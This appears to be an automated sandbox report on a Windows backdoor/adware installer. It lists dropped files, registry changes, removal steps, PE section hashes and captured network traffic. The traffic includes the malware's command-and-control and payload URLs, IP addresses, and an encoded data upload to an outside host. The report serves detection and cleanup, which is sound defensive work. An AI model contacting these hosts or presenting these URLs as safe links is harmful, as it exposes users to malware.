The process rundll32.exe:1196 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C B3 A7 58 2D 80 17 B5 4A FC 58 61 A2 3F 52 45"
Dropped PE files
| MD5 | File path |
|---|---|
| 79f9311ac6a5009fef1a5756a0a529d3 | c:\Program Files\ActiveCoupon\ActiveCoupon.exe |
| d6afed6a20c3343acb878ffa399f538b | c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll |
| 9f6c52eec607111136cd222b02bf0530 | c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe |
| 9f6c52eec607111136cd222b02bf0530 | c:\Program Files\Chime\Chime.exe |
| 4277381dbc9bf652805dad7fc0527793 | c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.dll |
| 9f6c52eec607111136cd222b02bf0530 | c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:1932
regsvr32.exe:1980
ArmorerRise.xyz.exe:2036
%original file name%.exe:1176
%original file name%.exe:1988
%original file name%.exe:368
%original file name%.exe:1888
%original file name%.exe:188
%original file name%.exe:1016
rundll32.exe:1432
rundll32.exe:1196
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)
%Program Files%\TailCutter\TailCutter.dll (80814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
%Program Files%\Chime\Chime.exe (1504 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
%Program Files%\Chime\Chime.dat (5 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 289472 | 289792 | 5.22326 | 0b29ab3ccbc000e05e55a97d0cfb232d |
.rdata | 294912 | 18878 | 18944 | 3.30236 | 729772da64321bbeffad66bb1b3e1d38 |
.data | 315392 | 142804 | 132096 | 2.08665 | 2ccbe851032a092ba4bbf57df05bb72d |
.rsrc | 458752 | 16120 | 16384 | 4.22721 | 699f51992a29975ccec7d79727813e0b |
.reloc | 475136 | 6784 | 7168 | 3.47446 | fd43122d257222321aa1ceb2a0ee72a3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://linq-goody-best.xyz/hp/?q=XDOtvcE+9jE/sqMztvXFjnV0Q9S5QAWSoMFJVLK2BupEE8V7TCpqJoGq/iUeUKvbvmDwEpIGujfPRivaynoO9il//gnTI+akMQhfaElhTWusj5ht3kdqYS0gcmr8lJRjyYajy0WmpJYzt8V1hGGJd6bu1v1Wjq6fQOF0vAXOLe0aIPkSZPKdnETmEH0PtwjHTGUMXNiBdiO7KPOOSY8c/Dvf5mTLc05Yr1a5uwXIQgSoV30s915myZ8+GZD2/5iQxW6ZCDtTnWb5vPL/R0cB3VtBtXt++aiHLFtYt9rxpIMJS30soMfKTAbZNbyO4WGAc4gMuLVlHX4yIkVjv+6VAlvUM | 54.68.13.248 |
hxxp://r1.mytholiday.com/ | 54.69.32.99 |
hxxp://goldavid.com/?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 | 54.68.254.5 |
hxxp://r1.mytholiday.com/?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://goldavid.com/?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 | 54.68.254.5 |
hxxp://r1.mytholiday.com/?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://goldavid.com/?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 | 54.68.254.5 |
hxxp://r1.mytholiday.com/?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://storestral.com/?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 | 54.149.75.132 |
hxxp://r1.mytholiday.com/?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://storestral.com/?e=ressal&sfx=2&cht=0&dd=5&cid=599&vn=159&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 | 54.149.75.132 |
hxxp://r1.mytholiday.com/?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://c1.storesis.com/?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://c1.storesis.com/?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://c1.storesis.com/?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://softwareziip.info/?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 | 54.68.254.5 |
hxxp://loveshero.net/?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 | 54.68.254.5 |
hxxp://c1.storesis.com/?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
hxxp://c1.storesis.com/?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 | 54.69.32.99 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /?e=ressal&sfx=2&cht=0&dd=5&cid=599&vn=159&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: storestral.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:46 GMT
Content-Type: application/octet-stream
Content-Length: 246135
Connection: close
Content-Disposition: attachment; filename="XwPLangqfnEVNV.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.s....9Z........k....dD..dD......^.$.l.......v.h.^.).U..A...%.3..m.p.w......g._.g.].@u.....q.R..;.i.~._......t.}.VK.7.o.z.S..2...p.y.Z}.e.M...'..3...j.E.M<...^.u.V..-...&.J..4...c.y.RQ.)...<.F..(...g.}.^Q.....1.B..'...y.D.M-.B.P.,....V.z.6....|...|.g.Z$.(...v.G..*...3....h.....|....c.^...-..'.]...c.&V.6.l.i....l.@.-...>-.l.L. .L..Z.P.`.T.\2.P...".E..5...l.].Ej.H.4.5.\N.R.N.*....0.V...r..<.8...q.J..!...&.@.[L...[.9....v.}......y.U.a.'.N..;...w.H..=.I.p.e..c...B.a.T..f.....V.G(.....m.U..).....R..,...e.m.Q9.o.G.}.2..(.Y.%..../.....'....x.......Yh.......Q,.J...(....f.G......v.j.J.r.R..n...v.F.YM...].c.J..z...;.P.E?...t.}.@2. ...<.\..2.O.h...M". ...a.J..W...o.V.[3.G...p.@..".Y.`.<..*.....w.40.;...|.... .^.&.6........&....{.`.t.X.Q-.....-....v...a.K..u.M.7.2.9..a...}.*..(.Y.%..../.....'....x.......Yd.....{.TA./.....D..>...a...P\. ...<.N..i...}....*.....q.R..5.....B.]=.....o.N#.9...~.N..Y...c.k._?.|...>.X..6.L.d.'.I......p.@..".V.n.A..8.....w..3.;...r.M..$...-.}.^d.....c.B..,...k.A.Zr...X.6....w.|......z.Z.b. .M~.:...v.Z..c... ....n.O.t......b.B.j.X.Ev.....~.Qc.......]..-.L.a.z.F1.$.Q.p.K..4.K.)....f.m.u.-....e...a.^.S ...g.x..d.7.T.z.S..2...|.d..k.k.V.{.A..o.K.=...37.......D..:...k.^..k.I.5.4.]M.U.M.5....1...~.s..?.....v.I..2.I.'....d.k.w.#....k...p....".q.w.f."!.:...v.I..0...w.G.XK...r.r....u.Y.$. .7".W.K. .SO.S.I.i.\..5.\.a.z.B1.$.[.p.K..&...#.C.\I.....9.R..q...q...] .w.u.`..h.9.....S..~.^. .v.TL.d.\.&....;...d.7.I......o.K..v.F.#.N..D.\.$....". ...|....6...&.s..?.......L..F...s.Q.Q-..
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 3756
Cache-Control: no-cache
data=KlKoj7SOOXXPYSUMOQaak&report=LrcYUNeDfGeclBotvqQjOCkHvfmyW35 ilZTgk5s4OurWxUKlGaGFT/gViZ6fU/ KQoqmDHf t0nZE0D7tBm0O4yFkfggJnJY1U2hGE8OeU0sW3FxeAuI7wuIk6u6Z5k5HQe3IOCNv9croWS46/bPFRuTo4COD6JuHAUFQEj8Lplqx5zbWq3kX31JDpnF6 m3AOOiFEFGCZNoAl0yWB8tda57ofh687ARHaIqDsSwINy9Cw7K9ukxIFAlnY9LIjwqhILXO2fCsYPyYizaYtN L/ajGCP1J1zj3fhJQMbIZuoIwEQMZ4gNzrgz6uCBFDBjycb6wgvcLgmwzWvo8FSen1mYXltqtv2XKqb5DtPKUmd8fOaE0IWxE2yh8YzV1m8VRPKpPeDCyKVwK4qC3iF1F CqdEup1JwonXt TsukkoRVDxpr0KOA3zpUT5aXnMzkpeZt/urTinhwKze2MvCDtDgYOuyeyWfkrzw15gigj/qO4CL1dpNodsx9dS1I8yIpwmDzAoNUk FzmI1SF/Z/i2ovWMMGgW5yGaE6W2UQxcTjQyXMa iztypcQX56gntlvsjU7IuP/myFE58vrYns0jrIaSDwIJEQn QcRLyd5IJgAkslSdXbQwPiJ82Cc9TQalGbr9HrbySfTOomzSZVJ1fCmD6St6iFQOLoglBpdRsDfgsklkw3ypKNApvaPnX5d7dBcv4HjmUpAP0 0WGonSoeSJnrtAsvajjwoJQNtuGvNtF2IGyG2K8mBx/Gaa I1rplUsaJNbZSxJt/311vHvCRSUog1HeFd7RcatechXK5DH7NtuPl6KmUcsDna m65l1nJBhDoZKGN8Tx/3Qyp/Mo Qevk1TlAdos9wSNcR/N0anngSE0AMQED fWo0HO3746k7roNaAYC0EBtYj6rFy91Qo75FLcsyp9X5b5pwCJmx1apomL326wDdjwvxfbt7MFoyJjhxNcY214yYZg9l4ooNhMc2CjOQQ/w HuolShQhErKaLj VTRXws3K7qYkYDF6Z mwu56VcA2eND5nr2kNEJZKp7slM0oy7KhHUXffOzxBmaWPscgPUGKjE4xNwIL9/NwLzsoZPfTOEY9NZfg5I2qzLBxh4kU9gZsoQBt3V3eYDcwZkilzEKIkeG8v9C1hxYMuODWs ZIhdyYPCFpcUsbbEBZPcZUhzMqc8N4JjKbmOZRZwIyQNdgu5lmB6TW2UOBI42r0Y/VvmaxOICqnO 8t7HYallKzwDkFNoYsATz7/VVtIu07
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:30 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:25 GMT
Content-Type: text/html
Content-Length: 9774
Connection: close
Content-Disposition: attachment; filename="3.txt"
..g.v.Y.G.f.M.O.I.J./.u.V.q.p.H.G. .x.R.7./.W.d.9.J.k.0.y.W.x.I.B.y.k.4.X.F.i.C.x.9.o.9.q.O.M.J.M.9.X.s.o.B.m.n.s.Z.f.M.r.F.B.y.M.3.z.j.1.T.Y./.H.N.L.B.T.N.B.c.9.m.R.J.t.6.d.c.T.9.9.H.V.M.f.Z.g.o.z.n. .4.3.8.B.D.z.3.3.n.k.Y.j.r.k.B.s.S.4.X.S.A.h.M.K.T.B.z.j.u.I.u.C.s.M.M.w.d.q.V.9. .c.T.V.A.5.c.t.s.c.3.s.2.Q.w.F.M.4.p.S.m.G.a.w./.M.C.V.G.4.B.O.h.d.3.2.M.b.t.i.y.b.j.D.v.k.U.X.u.h.l.Y.m.E.0.t.Y.I.s.L.h.Z.g.e.i.Q.J.O.j./.w.b.H.W.H.F.A.R.F.x.P.8.P.E.c.q.m.n.g.q.i.m.9.B.e.I.H.L.r.O.T.3.d.U.T.E.2.m.k.p.S.e.E.X.U.g.2.T.X.u.D. .L.0.X.V.2.6.N.t.N.i.O.H.N.R.a.N.V.Z.m.a.X.i.W.8.f.E.b.c.5.o.7.O.X.0.Q.j.u.h./.1.Z.g.X.d.f.i.B.5.z.v.c.l.H.V.T.5.8.5.E.j.1.W.s.k.i.C.o.s.Q.a.G.R.7.A.m./.4.K.k.W.T.j.l.T.G.A.I.g.T.X.0.o.R. .0.S.b.Y.c.g.i.Z.N.3.a.f.F.X.d.x.R.K.q.U.I.7.5.5.V.T.c.N.M.8.u.F.q.P.A. .h.n.X.I.Y.e.7.L.8.I.W.v.T.q.j.L.T.M.v.l.J.U.q.r.S.8.g.6.d.t.u.9.5.r.K.a.s.y.I.i.5.M.9.x.A.s.e.v.E.O.u.1.I.Q.p.P.y.I.5.s.s.5.k.s.U.k.d.H.4.9.f.E.N.I.x.U.M.p.1.4.d.f.h.C.3.X.d.z.0.I.s.C.o.4.M.j.Z.U.d.2.H.U.Y.s.N.x.9.N.I.L.t.U.V.E.a.g.D.r.Q.m.W.N.P.a.H.l.0.U.b.X.O.I.t.f.l.t.7.f.d.z.V.8.N.l./.t.g.y.V.2.f.z.p.Z.R./.p.4.7.z.t.G.u.I.d.n.l.E.d.s.U.N.x.b.P.k.2.G.2.d.w.k.N.X.Q.k.M.S.C.R.u.L.K.K.W.6.H.T.Y.U.C.D.0.0.4.G.A.t.B.F.B.O.i.l.m.J.l.3. . .k.a.r.O. .5.6.o.Q.g. 